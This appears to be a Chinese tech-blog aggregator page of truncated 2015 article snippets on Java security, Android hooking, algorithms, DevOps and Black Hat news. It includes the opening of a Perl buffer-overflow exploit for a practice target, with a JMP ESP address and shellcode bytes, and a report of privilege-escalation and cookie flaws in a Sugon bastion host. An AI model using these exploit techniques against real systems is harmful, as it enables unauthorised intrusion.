http: freshman.ccnu.edu.cn

全面保护你的Java程序安全 2015-08-10

  第一部分:Java的安全基础--虚拟机和字节码安全 概论:安全问题对很多数人来说都非常重要.从其历史看,Java安全主要意味着虚拟机和字节码安全.然而这个看法忽略了两个重要方面-应用程序和网络安全.在下面一系列文章中,Todd Sundsted讲解了JAVA虚拟机安全,应用程序安全,网络安全,解释了应该采取什么样的措施来全面巩固你的Java安全.在这第一部分,他向我们解释了Java安全的基础:虚拟机和字节码安全. "似乎还没有人曾因为写出了不安全的Java代码而遭解雇".这句话是我

中科曙光堡垒机设计不当存在各种越权漏洞 2015-08-10

新建两个用户普通用户:test1管理员:test2 执行个添加管理的操作,test1的sw_login_id为105274ViewPage.ssi?_type=user&_id=2&_action=new&_hiden=whichgroup&_show=mini 查看下添加上了 很多不一一说了各种xss没做任何防护 登陆后产生的cookie如下:last_login_type=1; sw_login_id=31 cookie太简单了,去掉last_login_type发现会

Android.Hook框架xposed篇 2015-08-10

官方教程:https://github.com/rovo89/XposedBridge/wiki/Development-tutorial 官网:http://repo.xposed.info/module/de.robv.android.xposed.installer apk:http://dl-xda.xposed.info/modules/de.robv.android.xposed.installer_v33_36570c.apk 源码:https://github.com/rovo8

企业安全管理(二) 2015-08-10

建立一支安全团队 注: 这个题目有一个上下文,就是在我写的企业安全系列里,只针对去互联网公司建立甲方安全团队,不适用于其他场景 如果要去一家公司领衔安全建设,第一个问题就是如何建立安全团队.上面提到不同的公司状况对应的安全建设需求是不一样的,需要的安全团队也是不一样的,所以我按不同的场景来深入这个问题. 在目前国内的市场中,BAT这种公司基本是不需要你去组团队的,对安全负责人有需求的公司大约是从准生态级互联网公司.平台级互联网公司.大型集团的互联网+.千千万万的互联网创业型公司…… 如果你在一个

html特殊字符的html,js,css写法汇总 2015-08-10

⇠  箭头类 符号UNICODE符号UNICODE HTMLJSCSSHTMLJSCSS ⇠ &#8672 \u21E0 \21E0 ⇢ &#8674 \u21E2 \21E2 ⇡ &#8673 \u21E1 \21E1 ⇣ &#8675 \u21E3 \21E3 ↞ &#8606 \u219E \219E ↠ &#8608 \u21A0 \21A0 ↟ &#8607 \u219F \219F ↡ &#8609 \u21A1 \21A1 ←

poj2506 大数递推 2015-08-10

Tiling Time Limit: 1000MS   Memory Limit: 65536K Total Submissions: 8205   Accepted: 3974 Description In how many ways can you tile a 2xn rectangle by 2x1 or 2x2 tiles? Here is a sample tiling of a 2x17 rectangle. Input Input is a sequence of lines,

数据结构 并查集 2015-08-10

时间过得真快,一眨眼集训第二周就要结束了.有很长的第一段时间没有写算法类的博客了.今天先来一篇 并查集. 1.什么是并查集 并查集(Union Find)是一种用于管理分组的数据结构.它具备两个操作:(1)查询元素a和元素b是否为同一组 (2) 将元素a和b合并为同一组. 注意:并查集不能将在同一组的元素拆分为两组. 2.并查集的结构 并查集可以使用树来实现. 使用树形结构来表示以后,每一组都对应一棵树,然而我们就可以将这个问题转化为树的问题了,我们看两个元素是否为一组我们只要看这两个元素的根是

Fbric、Ansible、Docker、Chaos Monkey:DevOps工具的年中回顾 2015-08-10

Fbric.Ansible.Docker.Chaos Monkey:DevOps工具的年中回顾 [编者按]近日,Cyber Engineering Solutions Group 技术经理 Hasan Yasar 在 SEI 攥文盘点了当下流行的 DevOps 思想和工具,其中包括Fabric.Ansible.Docker.Chaos Monkey等.本文系 OneAPM 联合高效运维联合编译整理: 在2014年年底,SEI 博客发表了一系列有关 DevOps 的博客文章,提供指南,实用的建议和

溢出Perl 看雪exploit_me_A exploit by k8team 2015-08-10

#!/usr/bin/perl # Perl exploit_me_A  exploit by k8team # Date: 20131018 # Tested on: XPSP3 if (scalar(@ARGV) != 2) { "Usage $0 host port\n"; exit; } use IO::Socket::INET; my $JMPESP = "\x12\x45\xFA\x7F"; my $JMPback = "\xb9\x41\x4

解析大型.NET ERP系统 20条数据库设计规范 2015-08-10

数据库设计规范是个技术含量相对低的话题,只需要对标准和规范的坚持即可做到.当系统越来越庞大,严格控制数据库的设计人员,并且有一份规范书供执行参考.在程序框架中,也有一份强制性的约定,当不遵守规范时报错误. 以下20个条款是我从一个超过1个数据库表的大型ERP系统中提炼出来的设计约定,供参考.   1  所有的表的第一个字段是记录编号Recnum,用于数据维护 [Recnum] [decimal] (8, 0) NOT NULL IDENTITY(1, 1)   在进行数据维护的时候,我们可以直接

android屏幕适配方案 2015-08-10

以前看了android的屏幕适配方案,有很多种,其中自己用到的一种是:先找一款主流的分辨率的android机,如:1080*1920的分辨率做基准,然后在这个基准上,调整好一切布局,图片.适配其他手机分辨率的手机,用百分比来调节.例如:在480*800的主流手机上,写了一个height=520,那么在480*800的手机上,这个控件的高度则为 480height = 520 * 屏幕高度/1920. 这样的方案做屏幕适配.   项目遇到一个问题.在剩余空间里,在1080*1920的手机上适配很好

ADMT3.2域迁移之Server2003至Server2012系列(四)创建林信任关系 2015-08-10

本章我们来创建林的信任关系,想要实现两个林间的迁移那么就必须用到信任关系,起到相互验证. 登陆任意一台域控本实例在win2008上 打开[Active Directory 域和信任关系] 点击[新建信任] 输入源服务器名称 选择[林]信任 选择[双向] 选择[此域和指定域] 输入[ma.com]域的管理员账号密码 选择[全林性身份验证]注意红圈处 选择[全林身份验证] 选择信任完毕 信任创建完成 传出信任 传入信任 完成信任创建 查看信任纪录此处为win2008 查看信任纪录此处为win2003

软件定义数据中心条件下的物理基础设施优化之道 2015-08-10

  DCD上海站在浦东嘉里大酒店召开,在“如何优化物理基础设施,实现软件定义数据中心的顺畅运营”这一专家讨论环节,来自数据中心专业服务商的data24公司总裁罗耀兴与业内专家.分析师们,一起探讨SDDC给数据中心基础设施的规划设计和运营所带来的挑战和机会. SDDC:实现数据中心弹性扩容 在谈到在云计算及SDDC的全新应用模式下,如何进一步优化数据中心.合理规划基础设施的问题时,罗耀兴认为, SDDC从运用的角度提出了如何更有效使用IT系统资源的新思路,力求建立更有动态和弹性的资源配置方式,便于

排序算法五——快速排序 2015-08-10

基本思想 快速排序也是基于分治算法得.步骤如下: (1)选择一个基准元素,通常选择第一个元素或者最后一个元素: (2)通过一趟排序讲待排序的记录分割成独立的两部分,其中一部分记录的元素值均比基准元素值小.另一部分记录的元素值比基准值大: (3)此时基准元素在其排好序后的正确位置: (4)然后分别对这两部分记录用同样的方法继续进行排序,直到整个序列有序. 上图中,演示的是第一轮快速排序的过程,首先将第一个元素选为基准点,从右端第一个元素开始扫描,找到第一个比57小的元素(19)时停止,两者交换位置

_DataStructure_C_Impl:稀疏矩阵三元组 2015-08-10

#include #include #define MaxSize 200 typedef int DataType; typedef struct{ //三元组类型定义 int i,j; DataType e; }Triple; typedef struct{ //矩阵类型定义 Triple data[MaxSize]; int rpos[MaxSize]; //用于存储三元组中的每一行的第一非零元素的位置 int m,n,len; //矩阵的行数,列数和非零元素的个数 }TriSeqMatr

青岛微商宝诚邀php微信开发工程师加盟 2015-08-10

青岛微商宝是专业微信公众号开发公司,是红黑联盟所属公司投资创立.是目前青岛最好的微信开发公司之一. 微信产品php开发工程师   1.精通PHP+Mysql,有年或以上开发经验: 2.熟练掌握js,css等前端开发技能的优先 3.熟悉微信产品开发,微信接口使用的优先 4.有较好的沟通交流能力,能够迅速融入团队: 6.责任心强,工作稳定 待遇: 我们将秉承互联网公司特质,采用工资,奖金,期权等进行回报,诚邀优秀人才加盟 工作地点: 青岛市市北区延吉路万达或黄岛区珠海东路136号创业大厦. 联

Homestead 集成开发环境配置 2015-08-10

Laravel的目的就是让开发这的开发体验更愉快,开发过程更加简单.在环境搭建上也是如此. Laravel homestead是一个官方发布的vagrant封装包--一个虚拟机--提供完备的开发环境.在homestead配置完成后,不需要在本地环境中配置任何的开发工具,vagrant可以搞定一切.因为是虚拟机,不会对本地系统产生任何的破坏.同时如果出现故障,可以在几分钟内销毁并重建虚拟机. homestead是跨平台的,可以在windows,Linux,Mac上运行,其中集成了nginx,php

BlackHat:大多数网页模板漏洞可被利用轻易突破沙盒 2015-08-10

这种注入攻击方式的后果要比XSS更糟糕 在Black Hat 2015大会上,安全研究人员们警告:一个关于web安全脆弱性的新的威胁可能会严重损害我们的安全. 今天,为了在网站页面或邮件中动态地呈现数据,模板引擎被web应用广泛使用.这种技术提供一种服务器端的沙盒.然而,“允许不被信任的用户编辑模板”这种习以为常的惯例引出了一系列严重的风险,而这些风险或许在模板的文件系统中不那么容易被发现. 用户不能安全地向模板中输入数据这种风险确实存在,并极有可能被利用来向服务器中注入恶意代码. 被PortS

BlackHat 2015:安全从业人员的残酷未来 2015-08-10

第18届黑帽安全大会的开幕演讲上,其创始人杰夫·莫斯预警即将到来的危机:“未来十年,安全从业人员或许会有职业安全感,但很可能不能从中找到什么乐趣.” 我们都终身受聘.这很有趣,我看到了问题和挑战,一方面真的很兴奋,另一方面却只想睡个好觉.下一个5年的决策将影响未来30年的技术应用,而目前为止显露出的迹象并不太好.迎面而来的是旧问题重复出现新问题层出不穷的混合状况. 比如说,加密战争重现江湖,新一代政客和执法官员要求享有加密软件的后门访问权,就像他们在90年代所做的那样.技术人员有责任告诉他们为什

谷歌收Nest冷解读:智能家居春天还太远 2015-08-10

智能家居:将科幻照进现实 文/顾晓波 或许是32亿美元的价格太惊人,谷歌对Nest这家小公司的收购引发了行业关于智能家居的大讨论,有一派观点说:智能家居的春天就要来了. 从北京城隔三差五的硬件展,到拉斯维加斯高大上的CES,各种智能灯泡.电视.路由器.安防设备甚至牙刷,以及千奇百怪的芯片解决方案充斥现场,创业者众人拾柴,加上谷歌等大公司火上浇油,得出这样的结论并不令人感到意外. 不过很多从业者却并未把这比交易看得太重,因为Nest作为一家生产温控器和烟感器的智能家居公司来说,它不值这么多钱. 谷
一周排行
  • 参考:http://blog.csdn.net/ssyan/article/details/7471343 也是出现类似问题,在前台页面的隐藏域中判断id是否为null,而没有去判断是否为空字符串. <s:if ...
  • 一.XMLHttpRequest的由来               XMLHttpRequest是AJAX的核心技术,通过调用XMLHttpRequest对象的属性和方法可以实现在客户端和浏览器之间进行数据的异步传输 ...
  • 4月9日消息,英特尔(博客)董事长格瑞格·贝瑞特周三表示,他预计各国政府的经济刺激计划在8个月后才能有助于全球经济的复苏,但很难预测芯片市场的复苏时间. 据国外媒体报道称,英特尔今年1月发布第四季度财报:主要因 ...
  • [1]制作PE启动盘,参考 http://jingyan.baidu.com/article/72ee561aadfb1fe16138dfab.html [2]拿PE启动盘启动电脑,重置密码,参考 http://ji ...
  • 首先要介绍一下<Ajax模式与最佳实践> 作者Christian Gross的新书:Ajax and REST Recipes: A Problem-Solution Approach在Amazon上搜索 ...
  • 你知道莱特币挖矿对电脑配置的要求吗?看看下文可以帮助到你 莱特币算法是scrypt,该算法的特点就是杀硬件,就目前LTC的价格来看,没有开发asic的必要.scrypt根本就是为限制fpga而生的.所以想从fpga方 ...
  • MyEclipse6.0 安装svn插件 博客分类: 技术   只说一种在线安装流程: 1. 打开Myeclipse,在菜单栏中选择Help→Software Updates→Find and Install: 2. ...
  • 前提: 一.每位同学的IP地址为172.16.X.1, 子网掩码为255.255.0.0,网关为172.16.0.1,DNS服务器为172.16.0.1,主机名为stuX.magedu.com,其中X为你的座位号: ...
  • 1 平台设备和驱动初识platform是一个虚拟的地址总线,相比pci,usb,它主要用于描述SOC上的片上资源,比如s3c2410上集成的控制器(lcd,watchdog,rtc等),platform所描述的资源有 ...
  • 在英雄联盟中,每条线都想和平发育是不可能.总有一条线上会不断爆发人头,这条路被我们称为人头路.看看下文具体的介绍 在英雄联盟中,每条线都想和平发育是不可能.总有一条线上会不断爆发人头,这条路被我们称为人头路.不可否认 ...